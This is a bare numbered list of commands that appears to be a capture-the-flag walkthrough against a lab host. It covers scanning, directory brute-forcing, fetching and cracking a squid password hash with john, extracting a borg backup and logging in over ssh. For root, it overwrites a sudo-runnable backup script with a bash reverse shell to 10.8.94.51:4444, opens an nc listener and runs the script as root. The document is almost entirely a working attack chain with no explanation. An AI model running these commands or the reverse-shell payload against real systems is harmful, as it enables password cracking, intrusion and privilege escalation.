1 - nmap -A 10.10.68.219
2 - gobuster dir -u http://10.10.68.219 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
3 - view-source:http://10.10.68.219/etc/squid/passwd
4 - john hash -w=/usr/share/wordlists/rockyou.txt
5 - wget http://10.10.68.219/admin/archive.tar
6 - tar xvf archive.tar
7 - borg list home/field/dev/final_archive
8 - borg extract home/field/dev/final_archive::music_archive
9 - cat home/alex/Documents/note.txt
10 - ssh alex@10.10.68.219
11 - cat user.txt
12 - sudo -l
13 - chmod +w /etc/mp3backups/backup.sh
14 - cat > /etc/mp3backups/backup.sh << EOF
#!/bin/bash
bash -i >& /dev/tcp/10.8.94.51/4444 0>&1
EOF

15 - nc -lvnp 4444
16 - sudo /etc/mp3backups/backup.sh
17 - whoami
18 - cat /root/root.txt
